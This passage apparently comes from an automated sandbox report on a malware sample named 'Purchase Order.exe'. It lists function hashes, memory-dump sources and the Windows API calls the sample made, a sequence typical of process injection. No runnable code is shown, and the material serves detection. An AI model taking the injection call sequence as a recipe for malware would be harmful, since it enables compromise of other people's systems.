Instruction Fuzzy Hash: 15212AB1D103599FCB14CFAAC885BDEBBF5FF48310F10842AE919A7241D7789954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C24170 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C24200

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 84fab29096873f3d0532ece8feb40a4ed9021e86038d5ffe33be1d27e87c663e
Instruction ID: 7cff7dce02d7a10b4dc6e39827cbf11030a5e715d3224315eaf7867deb90d303
Opcode Fuzzy Hash: 84fab29096873f3d0532ece8feb40a4ed9021e86038d5ffe33be1d27e87c663e
Instruction Fuzzy Hash: 3C2139B1D003599FCB14CFAAC885BDEBBF5FF48310F10842AE919A7240C7789954CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0094D918 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0094D8E6,?,?,?,?,?), ref: 0094D9A7

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0ff5143e0251b19c907e9d1e034215e19264ea5594bb5e4d87ae7eaae4ab5545
Instruction ID: 5b626d31116387f52777c369df556405e9dda99f0af940f0bd4ed718a2a8ad04
Opcode Fuzzy Hash: 0ff5143e0251b19c907e9d1e034215e19264ea5594bb5e4d87ae7eaae4ab5545
Instruction Fuzzy Hash: 0A21E3B5D11249AFDB10CF9AD984ADEBBF8FB48320F14801AE959A7310D374A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06C23FD0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C24056

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 59137c34e6ab253361a37f8a50910bc483fe68c3549ca0f682007f33b7f0fd36
Instruction ID: fe886eab670cf947c5a5be16fd3a002c9c205fd7d9d5fe3c28acfd9396ba5807
Opcode Fuzzy Hash: 59137c34e6ab253361a37f8a50910bc483fe68c3549ca0f682007f33b7f0fd36
Instruction Fuzzy Hash: 72214871D002498FCB14DFAAC485BEEBFF4AB88314F508429D819A7240C7789945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C24258 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C242E0

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: bb6bfa6aab8d8a932e706aa8ef4b3069314da918b46e6aeb4eff8dfa3e8b6a43
Instruction ID: feeda27baaaab6fb768cadc4ac3c3382de310832e6c97070de2597433427a801
Opcode Fuzzy Hash: bb6bfa6aab8d8a932e706aa8ef4b3069314da918b46e6aeb4eff8dfa3e8b6a43
Instruction Fuzzy Hash: 8E2128B1D0025A9FDB14CFAAC885AEEFFF5FF88310F50842AE919A7240C7359545DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0094BA30 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0094D8E6,?,?,?,?,?), ref: 0094D9A7

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4483a002e00f62e12b508558bdbf9592cf58c5d49aa29e830aa27ac4ec55dcdf
Instruction ID: 3e176d7bc62574dddc6e6795e97085b5c234418d98405a3904b6ace891fc300d
Opcode Fuzzy Hash: 4483a002e00f62e12b508558bdbf9592cf58c5d49aa29e830aa27ac4ec55dcdf
Instruction Fuzzy Hash: 9521E4B5D01349AFDB10CF9AD584ADEBBF8FB48310F14841AE919A7310D378A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C23FD8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C24056

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bebf0d4e63f157c7e799c0658216b66c0f4ffad1be35055c6ce812626e6963a9
Instruction ID: 0192e7b48ea4106610b23f095416fed16a7be928d420fcf944db7ed32e1576f3
Opcode Fuzzy Hash: bebf0d4e63f157c7e799c0658216b66c0f4ffad1be35055c6ce812626e6963a9
Instruction Fuzzy Hash: 9B2107B1D002498FDB14DFAAC4857AEBFF4EB88314F54842AD819A7240D7789A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C24260 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C242E0

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0207fb5bd33be351c53739f6533cf5f91de131e1afb8c755d0f61a84d6768388
Instruction ID: 36bc44fbba660385811ded6d0d24e72b7ad37f2007f1673031fa37913e37445f
Opcode Fuzzy Hash: 0207fb5bd33be351c53739f6533cf5f91de131e1afb8c755d0f61a84d6768388
Instruction Fuzzy Hash: 252139B1D003599FCB14DFAAC845ADEFBF5FF48310F508429E919A7240C7349545DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C240A8 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C2411E

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6fa94c6a9db198e328176f6b8cefe3cfb95183b9020610dcc98f110d077dc23
Instruction ID: f0b173d98a16f781cb4791187f7810a1a9def55d5666153f913e95c682d8caf0
Opcode Fuzzy Hash: f6fa94c6a9db198e328176f6b8cefe3cfb95183b9020610dcc98f110d077dc23
Instruction Fuzzy Hash: 521159B1D002499FCB24DFAAD845ADFBFF5EB88324F108419E959A7250C7359550CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0094A408 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0094B319,00000800,00000000,00000000), ref: 0094B52A

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1789081f581ad2c4defba1397bd3aeb3c723b5012c4ba285d4fd55bea240f227
Instruction ID: 2104134481767874799e0cfcd6ddf3e4396bf44f5dc4664afc2e6ffb84083223
Opcode Fuzzy Hash: 1789081f581ad2c4defba1397bd3aeb3c723b5012c4ba285d4fd55bea240f227
Instruction Fuzzy Hash: 861117B6C003499FDB24CF9AD444A9EFBF4EB48314F14841AE819A7200C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C23F20 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C23F8A

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 61701efa6961d988c75cc94145416bd69bf5d201362d5c506476f8dc5c58c082
Instruction ID: 18908d4ef6cd4248d79854f5205c24b59283b1890dbbf9dc1d17787d7019a6f4
Opcode Fuzzy Hash: 61701efa6961d988c75cc94145416bd69bf5d201362d5c506476f8dc5c58c082
Instruction Fuzzy Hash: EC1149B1D002498FCB24DFAAD8457EFFFF8AB88324F248419D859A7240C739A545CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C240B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C2411E

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 274badc6e9735014753310c81b3efd5832e4f4ba9125968e3914012ecde10345
Instruction ID: 1ac9ada8b59f41ea80bdecadce6d5de8b1a15d0898d537b10cd1a0dfa1fd3781
Opcode Fuzzy Hash: 274badc6e9735014753310c81b3efd5832e4f4ba9125968e3914012ecde10345
Instruction Fuzzy Hash: A31156B2C002498FCB14DFAAC845ADEBFF5EB88324F208419E919A7250C735A550CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0094B4B8 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0094B319,00000800,00000000,00000000), ref: 0094B52A

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 042d98d05fcc9c7e2909e6d743af24166b7437445ad3660761d9708538695443
Instruction ID: 5374674fe8213e11c947de41cc91acb4cab3eda32624531b1daba77e68ab8f98
Opcode Fuzzy Hash: 042d98d05fcc9c7e2909e6d743af24166b7437445ad3660761d9708538695443
Instruction Fuzzy Hash: E61123B6C003498FDB24CFAAD448ADEFBF4EB88310F14845EE829A7201C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C28589 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06C28441,?,?), ref: 06C285E8

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: fd8e2dc5b7ba59642dad10b22e3ffb452ae9aacc5bcda22a6d6e6eaf806043a1
Instruction ID: e0fa9fe767eac59344897847b894762c96962de7040c5b5c9b0591d4fa1e7768
Opcode Fuzzy Hash: fd8e2dc5b7ba59642dad10b22e3ffb452ae9aacc5bcda22a6d6e6eaf806043a1
Instruction Fuzzy Hash: B61155B5C0024A8FDB20CF9AC445BDEBBF4EB48320F108429D959A7240D738A644CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C2696C Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06C28441,?,?), ref: 06C285E8

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8f7f9d33404c104326184f7ed2940c5ccdf9b780421426d102971c3e34197a2d
Instruction ID: 7133756152e5e7f25368b7ced89ccade72ca12ae1f85cb5a1158c865f5b0c807
Opcode Fuzzy Hash: 8f7f9d33404c104326184f7ed2940c5ccdf9b780421426d102971c3e34197a2d
Instruction Fuzzy Hash: 4F1125B1C0034ADFDB10DF9AC545BDEBBF4EB48320F10846AD919A7240D338AA44CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C23F28 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C23F8A

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 348f63f479694b4fc0868105f151e91927bf8344563d94ffcf5147e4a188cb8d
Instruction ID: e1fac499e7314cb83577b04c6796e7478ea63cf78ce8d2a319ffa27ef60e01d1
Opcode Fuzzy Hash: 348f63f479694b4fc0868105f151e91927bf8344563d94ffcf5147e4a188cb8d
Instruction Fuzzy Hash: 9D1125B1D002498FCB24DFAAD84579FFBF4AB88324F248419D819A7240CB79A945CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0094B238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0094B29E

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fe50723253757650ab6c16c34fadfbb3089c2fb47d74197ccaa0f6572cdfdb02
Instruction ID: 273c33420ab89b0d518f00f90b1f2a999e5b2e2d09848b9a2381126d563d54a6
Opcode Fuzzy Hash: fe50723253757650ab6c16c34fadfbb3089c2fb47d74197ccaa0f6572cdfdb02
Instruction Fuzzy Hash: 9F11E0B5C007498FCB24CF9AD444ADEFBF8EB88314F15851AD829A7210D3B5A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C26A19 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C26A7D

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8031c66ae5d24e93df03134e55f863a7efa42010e3c5ecadf3e85094dc4ac7a4
Instruction ID: 3680174efdff5bb0b199ffe453c4ab7bb6905334a55272abd9bd3f69c36099d6
Opcode Fuzzy Hash: 8031c66ae5d24e93df03134e55f863a7efa42010e3c5ecadf3e85094dc4ac7a4
Instruction Fuzzy Hash: 1411E3B58002599FCB10DF9AD945BDEFBF8FB48310F108459E919A7600C375AA84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C22990 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C26A7D

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a67edde9bf44bd9c0f833d0085ec95611fb8d4f522c15403e43cae1c16c4ae89
Instruction ID: 51fa480cff6d121920d79e2b8e469572b9371765290591ed1fcc75f56710e684
Opcode Fuzzy Hash: a67edde9bf44bd9c0f833d0085ec95611fb8d4f522c15403e43cae1c16c4ae89
Instruction Fuzzy Hash: 7D11F2B5800359DFDB20DF9AD849BDEFBF8EB48310F208459E919A7210C375AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 008CD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027292058.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8cd000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c73d42a6e3b5db3b2bb31b6d947915b5b1fc64b0a49ca252e8159146e652111
Instruction ID: 95157d7b54beb5ead9a1c6384c643a937b7950e17dbb568c238639428437bb3e
Opcode Fuzzy Hash: 5c73d42a6e3b5db3b2bb31b6d947915b5b1fc64b0a49ca252e8159146e652111
Instruction Fuzzy Hash: 582102B1500304DFDB08EF14D9C0F26BB75FB94314F24C56DDA098A246C336E816C6A5

Uniqueness

Uniqueness Score: -1.00%

Function 008DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027548498.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 393c1beb57ca11869ef9e6f9f6ce27039a5f83b672dbb845d85d83d942a0a6d6
Instruction ID: 081c038d70c80d44ae4b603b9847fcf88d4faf742d1e9fab38829062fd71eb4e
Opcode Fuzzy Hash: 393c1beb57ca11869ef9e6f9f6ce27039a5f83b672dbb845d85d83d942a0a6d6
Instruction Fuzzy Hash: 2621D3B1504744DFDB14DF14D984B16BB65FBC4314F24C66AD80A8B346C33ADC07CA61

Uniqueness

Uniqueness Score: -1.00%

Function 008DD005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027548498.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8dd000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e44bc68cc50e01707909f81fb4472fd4bf4d6fbb3bae227e36586dd5aea74c4
Instruction ID: 038acb580e52cd4438e2cd93aa5cd3ec729239674c5850f881031691ef1b9e80
Opcode Fuzzy Hash: 1e44bc68cc50e01707909f81fb4472fd4bf4d6fbb3bae227e36586dd5aea74c4
Instruction Fuzzy Hash: F72192755097808FCB12CF24D994715BF71FB85314F28C6EBD8498B697C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 008CD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027292058.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8cd000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction ID: 4bd5cb0500b665108bcd8f9b62ee4a3c0d5df240d5872b68e0a3d6998fab3e6c
Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction Fuzzy Hash: 4411CA72404380DFCB06DF00D9C4B16BF72FB94324F24C2ADD9094A656C33AE85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 06C217E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a5b71fe633b17ab3a8e13647a247b4fb143721813e041c7be3f632fbf66574
Instruction ID: f7ef44376cade4e89b700d414ca3dd60b5dcc625ed5044f67ca63af4e2861503
Opcode Fuzzy Hash: 08a5b71fe633b17ab3a8e13647a247b4fb143721813e041c7be3f632fbf66574
Instruction Fuzzy Hash: D0E10974E011298FDB14DFA9C5809AEFBF2FF89304F248169D918AB359D730A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C23700 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8a48de068325925930146990128e70abc15ac3fef85b1a8ccc003722281597
Instruction ID: 92cb870a8039d8c4f37366b03f036fbabc36597b3ca90daa86741ec9e6188bd4
Opcode Fuzzy Hash: 2d8a48de068325925930146990128e70abc15ac3fef85b1a8ccc003722281597
Instruction Fuzzy Hash: F9E12A74E011598FDB14DFA9C5809AEFBF2FF89304F24816AD818AB359D734A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C21C20 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b54b97a4977a08d8c94bc0ddecdbefb7fe014d7b487ea6e4f844185cf5d542
Instruction ID: b2d26e66a3825af033e477bb096a41db5cd8234ab56614eaa2baa2b971a7413d
Opcode Fuzzy Hash: a1b54b97a4977a08d8c94bc0ddecdbefb7fe014d7b487ea6e4f844185cf5d542
Instruction Fuzzy Hash: B8E11974E011298FDB14DFA9C5849AEFBF2FF89304F24816AD914AB359D730A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06C213B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa67fbf33e06ef7d39f0136e6300f3b14b0b401f16d2f219c99a0a0133ec595e
Instruction ID: 2f4252f1b55205eca728a815adb68b6521190dce9155a503617dd0be1c3a4395
Opcode Fuzzy Hash: fa67fbf33e06ef7d39f0136e6300f3b14b0b401f16d2f219c99a0a0133ec595e
Instruction Fuzzy Hash: 70E12B74E112198FDB14DFA9C5809AEFBF2FF89304F288169D918AB359D730A941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 06C22058 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a9f1f2d33079e73ef6bd42e8419ba905308ca993c6d256b3d7c8f32063ab5d
Instruction ID: 306d26e0b6bd51972cfc3b02dd037dc68081fdf4820a7d4a033889754f026c61
Opcode Fuzzy Hash: 97a9f1f2d33079e73ef6bd42e8419ba905308ca993c6d256b3d7c8f32063ab5d
Instruction Fuzzy Hash: 25E11774E1112A8FDB14DFA9C5809AEFBB2FF88304F248169D854AB319D735AE41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0094D604 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2027827115.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad2277a4d3c1df7146222fbf0a1387d5ce31f18ba988bd2a7d8dff9620852ca
Instruction ID: 5f52f9eab8eb840901fb82801e388b470be86ef62c7472bceee03aad76cfe8c3
Opcode Fuzzy Hash: fad2277a4d3c1df7146222fbf0a1387d5ce31f18ba988bd2a7d8dff9620852ca
Instruction Fuzzy Hash: BBA16F32E002068FCF15DFB4C85099EB7B6FFC5300B25857AE906AB265DB75E915CB50

Uniqueness

Uniqueness Score: -1.00%

Function 06C21C10 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2031810279.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c20000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a29df390717e872e95f3bcb5ba639dbee2392343e33da1d135651caa5404e8
Instruction ID: 4b909b49692623ac4e6f69227560543b08b885c94d4cbe03b5879b9bec2b77a0
Opcode Fuzzy Hash: d0a29df390717e872e95f3bcb5ba639dbee2392343e33da1d135651caa5404e8
Instruction Fuzzy Hash: 61510B74E012298FDB55DFA9C5845AEFBF2FF89304F24816AD818AB315D7309A41CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Purchase Order.exePID: 6336, Parent PID: 1480COMMON

Executed Functions

Function 052DB388 Relevance: 6.6, Strings: 5, Instructions: 351COMMON

Download Yara Rule

Strings

PHcq, xrefs: 052DB7A7
LjFp, xrefs: 052DB745
PHcq, xrefs: 052DB7B8
0oFp, xrefs: 052DB5C2
LjFp, xrefs: 052DB72F

Memory Dump Source

Source File: 00000003.00000002.4455616572.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 8b99d6594d7817d3cac6dd95d7e37380b64e66a334de985cb5d67f8316811309
Instruction ID: 44468d6a401b6647446482c05f567d8e2a84dff5db7b27dde059e038cc50dbdd
Opcode Fuzzy Hash: 8b99d6594d7817d3cac6dd95d7e37380b64e66a334de985cb5d67f8316811309
Instruction Fuzzy Hash: 90E1ED75E14219DFDB14DFA9C894AADFBB1FF49310F1680A9E819AB361D730A841CF60

Uniqueness

Uniqueness Score: -1.00%

Function 052DC7B2 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PHcq, xrefs: 052DCA18
LjFp, xrefs: 052DC9A5
LjFp, xrefs: 052DC98F
0oFp, xrefs: 052DC822
PHcq, xrefs: 052DCA07

Memory Dump Source

Source File: 00000003.00000002.4455616572.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_52d0000_Purchase Order.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: ae8484f4ba75e1cc042e18ff3c49d24bcbe88641e210f00041f5e3c0221e0944
Instruction ID: f6dcca7fc0adf2b55a0d07137125ba38e9fc07e33bfd7c8adf3cb648f79fdc59
Opcode Fuzzy Hash: ae8484f4ba75e1cc042e18ff3c49d24bcbe88641e210f00041f5e3c0221e0944
Instruction Fuzzy Hash: E981A274E102189FDB18DFA9D884AADFBF2BF89300F14C469E809AB355DB749981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 052DC1F0 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

